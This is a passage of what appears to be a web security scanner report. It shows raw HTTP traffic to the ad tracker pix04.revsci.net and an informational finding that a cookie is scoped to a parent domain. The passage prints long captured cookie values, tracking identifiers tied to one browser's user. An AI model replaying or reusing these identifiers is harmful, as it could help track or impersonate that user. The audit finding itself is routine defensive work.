Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_ZM6F="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSre0boepdUBIObzB9/hpep6V9WP6iKbig6b0C7EHwThgQyPsjf9nPZuPqSNDg70ldg+qxpjVw1j+2QxI1g4jRqBraX7I4lUnumt2BwjwxeJN/WXTaMQXC1n77CHcjb6QSobwM0x4LszpanoL7jNDzUpmR5LiVctuozNX1r3EHR97zJJsZO7zFtVtmbzAKXEGkwyvi+ASBQLjQjstsG56sotOcOuLU2c66Km7kpCiJjhh0up9LLEr6ZDj9Ux1a7foRYCak+Xy9yGbzF1sF1ken1j7eYXaIazmq0q6CxXtR/BQsVQs6ZVLuKrzFTwYgMvDnpDt5mLXJALSyyUdpCzGQ/WEVf9xgVgRQY+LdmMsVv/l0osuyg8IsU0B2B/ADpCF4BriIVgnPKQSiHxYZJjOXBQPwb45io0/+VWW9d28HpPz0D/zR5BSkoZlk6uJaLOKo02N8X6BWY6g2fAyzzPphZ1QEd3FHGjhBNwLdpoB/R79cD8LOUuq5vD8zuo/Sa0Se0/4gywZwo/PTpCjL82En3EGwiG6X+xhyyLY9rqHa3/5Wt7bbr+9+GXth3xRsdV/xVnwRxRbENal3o/L9zSaINdP6tu6594JznRrjV6f/phnB08q05IQ59DJGj7MYlNAev3qiADJsFLU+PByPsRhiXaFpfUiIhThu/x10Gr/L9shi77zqZv8hdmjAVy1RzGRAvUnwJLpTtUiwUL/Q5plvQBJI8KGfui8uQDdKQPeepn50D4QA4nDY+H6XL4cI7CPyB5EaP9W2TLiMo0Ozz2mrvewPyDuMsLOVptpv8nKF/gL9xQ26nLvjNdkjbHC6jPg+7AneW0RWK/4HmRo5y1ne0D2WBb6WPb5EHDGOJI1f/ma2ZQdSHpQpNXZ3oansb+OX7r5p3TZUNok/lY9gO3HIbXsKJOEdoDCqUssmSyMjeXpGd8fOOCc2MsqDAbSBH7pdqRyokbbsFiQRQctBX0oK7CGfMJ6LlOQmGsqap63EIxF9q/QBdRKe+w3k5sgIIIzoUCPKAH4hcnOL5CdEtcVdpeGKmRT9D87dJMNfL1BlKQqd18eNLK/DgnRPrZqTvIHJ6VzZDOgxsOlCKlGg/IR+ujF4UFMzHsitxKTRMnDwXb0BACZA2nEqPCh+NITOxu2qWUDSmzy2kpaB7tPRq+brmMhurgL8bk4uCQiNTHGrYBTwJQrrXusUmexOcUF915n8a8D8bqFJqwp+3hA7BaqtpCm6zXtHknvLjv0E8FsPLLTFVxyG5Pa3nmUCAgMLJ8pjOpE12Gzj9zbmV+prWKPMYNG1IAMWdZaZJdenltHUgoSoS+NJrCPmeMSY"; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v0lUZEkxjU7NelY0QcHuDIduuyxwj1aEyaWbQC+F/ow1QxM58Yyl6WnV++4nDYdJGqP3aEP/Els3EHmRToETTZFmihDhiVKOCXLxkiM17TU7zj4ngiQ4oRnPnFK89XPRmRV4IWSdXROcDuxjITdkLEY03nS13tB3wtTOwQKZEgSeSALCIxbusJEfXL9zmpsCYE22t4xzi4o9NKvXRAGU8PiJjcr/rHOJeDVjh+8Nwr6ukBIEminfvKX31X4TRXwz4MKEEm7SUVd6CUcoDnUzXeAi/Ct/TuruCiMtaygwY0AtigC9uSei/+HoKkWB4Aowhx48DKSIqsQsg0UYDjaqK95XiKBS91uetAb3fI46x9yMFzr2oOkBXZ6ASf282CVOAOSDpU+O3dhOmqH9FP7OlPwI6x5t0c0TJMTVpGN2v3qnTggdFXvmkjFzHQDqZdNW2n8/T3D4KuRGTu9pkIwnpOpJqqDL8ZlTqm1tx4nqVc24up7SInWtNx7NFc7BxYxVco7FMzrF92J6UpgIp+yIztei9sPUzKynkQ9sWomHNvCzgP6ccGH8UvNnL5S58r+C3uBIymBfMwCvaXNTp18jRw9bdzEAOKb/rvhJU2MzufW18Ip31v7GfY/TG4Sp9FjObKnLCuB+4RbNM07gH6sAorjAwk2VCaMxDYuK+Z6En1QLphpu4gVZF2sjYw/FLOFmI64MAcrke79ISvFyZGbyjNp9essYi+wchn4V07oHr4dabBjwFR23PZeiphiesFNb+cyoVNdyhlP9w/XvrRQbPBAWDY0BdGhwUIerxQ+uerOKduwscxIVtB+Mwv0jFEprhvzuE0kVIS28+gd2bm+WSGHVOCMciv9JataWaBZQGfs6pUvPzds1P7KLxugwGiX2zwbQZB7Gyjxy5Ia+BODCRc7SrZGeKnnpYfoIxNaRDKG7ninMFwF5gUNLyPVADN9lLUNfpYq+gra8ruVatoC9afDD+iMhSFd9G5D6am9KIP5qY5BtyqvGL7PgN9EQlf5YS5uFdp6OAWsS85f4uJA/1M18GXGH6VooGiXZ3BB53qQLC2jhFERFULUGK8hBP05FF0IBwyZZZ8dTP6jb0nMor7I/obqkaMul59jgfa98a2LGGot+R8yHelSB+bITuTFPB4/gTcZcMN/ssu4jqWHhULTzTbPcaBlbE2KvXKE4ku9tIu7EKwy7DVhpXlHoawd0H4MbxqbO9vbYn7lfc8SdcRxMDSxIoh/Rn4RuyP0XxnTk+50FTr1kui3jEbyG99/fspqLoJroJuooDvHDIKDN54/AXqyRj2N4VlVN3V9EwSaPkpt6r053l1/+ndkRrqqYmi1MHwprxFHI3BUZbDjwhXOgRG9Uiulq0P0FayIBteX/DuOG19nte3Z7xLH8NuacTm9qxpjMhx/Q7zD9eCbQy4Lo2ZtueYSKTE7VS36vSfGiQRYAbOnZoiYCjNGhHNAS7jl7/ACKHvbdfZpAs8Pt8o8wpjCN+nX8GTIMjMqpObF2Z6TGvwaUG719GeEQfxaZwvg3Ny5iJT+tzBf6taQvSuL20MSLoOKwtq5w71FxjQ4PfS0ac62VNHDjuT1SLlaoX1obism73xXeD/zKt49OhtJAd/Hzo9zO2ck4qrqD8IaBLh4rpnQOFzl53yQnK0ZjvRPLfkTqekmk0FO63N+d58vGrs7cjCxS0xln3boMB2H7+OFOKJgheBCIQ4QyzN2mjB4Gni5rdsSitq7HzwQRTw=="; rsi_segs_1000000=pUPF5M+huXIMpjaBv3Bh9+x8rQd3oS70An2dHHnLbyViGymJW18v6oxo5TQQ/CGgK6F5mxMDfx9648XwcVJCqgSkH7VVHUmG5kFwqZoeq+yaI0bhVf40CXlkl1+Rq1pruAxHphJqHataiCc4ssktlzVfsKejSdKUW1ejPUGlrIUMmJ/opLCXBEJqalRF2zz++kuS0j8FA3xbmwB0VW/Jj5TEabtOAJFHV2aMKdWI3SWQqMMiLmZ1z61uzEwnXBPHtLt+XHOVjt1leXVUQJas0YjhTYDD3iuGp5MzkWrEi1zltao3ShqOqRSg06vyDyeim1sjl9tnXGfKX74i/IPBY4HrOB6t1KOA5vyd622lF05TpmHJ4Qxslaqrq3JcdhBbBCL/bvXWc7TRvEYroA7SJDgDVQcl2sXKSNxkTN4FEAUU66Gqrsf4bxn58gaNdxjE/navXj273xLQtLpGaxKEcAUifYNFuiJW+Lc6LCksNzyc0PxiSPT3X8TN6PZVlDyskxK0fUMjCllk66J4IED/xpidrbkw2h1FHxH/U/kB0uLXK4awjjpZqPBL8Vd4UxC9flh9801fT3qLbDaRTahpAX4BVyUM28qcRoMKblYMH2u9ddDV35hsC7g7+Ttf1TvTY7R6yq2hVkV7e78bjeyj+lFn4Q==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAIEl+MaMcJSum2NZ+VEqMB7SuDqPkIcMw9wvTUz/xw+ppzybIZwKwWgY0UUnQiG5kFQmZouI+2ZBSjkw/QKBeEE1wCXGDbX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trGzWnlOqoD+91j7fcB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGRBe8iihXakPzZvmfKPy95K8ih9mXMMCtdrIvcMnFligtQN54cgzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU86AmxfH0WcSpYG/n1/A45enPmYXILcczr1Ob5LQAcyOcRgvCViQb7zYFshfEnFZbda/3YGUcrFK9Xi3pG7800xiuwYalL797YznATh2rdj1dKDgZGk4Jbi2sFQBKisvVDTNlX8HJRUaqJAIuoclVNyoFehm83fWnbz95BIraDDpoJqjc7iSIE12hbXKRDsV5A1T0NNU=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:07:42 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:07:42 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.179. http://pix04.revsci.net/I10985/b3/0/3/1008211/697771504.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/697771504.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OcxNyVGoDIbkhMYAlEzdn2gzAYqpNfvJZa/Jo670TbHku9uay0K7xnjpTzbSDrr0/WaMF3qDSd89+72HHwqxqPEGogh1DYXPxyCfsv2Fv4yo/VamCu60gdfrSpkkxxC6jnwnPe560IjBTYADgDOwotNJqmCgZH7pSGzXThqOqRSA06vyDyeimVsjl1voXGfKX74a/GPXY7/qOB6t1KMEqP4WwwDehYTwm2b8vNtOMqkvctcKGDDkKKB0UdJtcN0mSr75VwAK0XUY3vaRhdsaYshJs6UhVJLK/Val2KyEDmB+L2lp9JqHsvRLqgLOl5XDKKRLQc/UBmorHEc/TIHBJNS1mg130iTqUH4VheUU+7XmFCi7owUI1/JSNLf3zVlP93r+tmLtsYrZSu4oloPzFDWLZakEAK9m0inSch7wHhKP2jDUlKH25wqHet39UNQmd+V5pabMBUMBnSgPn8qcRoMKbm4MH0u9ddDZ35h8C7g7+ztf1TvTm7N6yq2hVkZ7u74bje6nd1VoGw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:22:25 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/697771504.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; 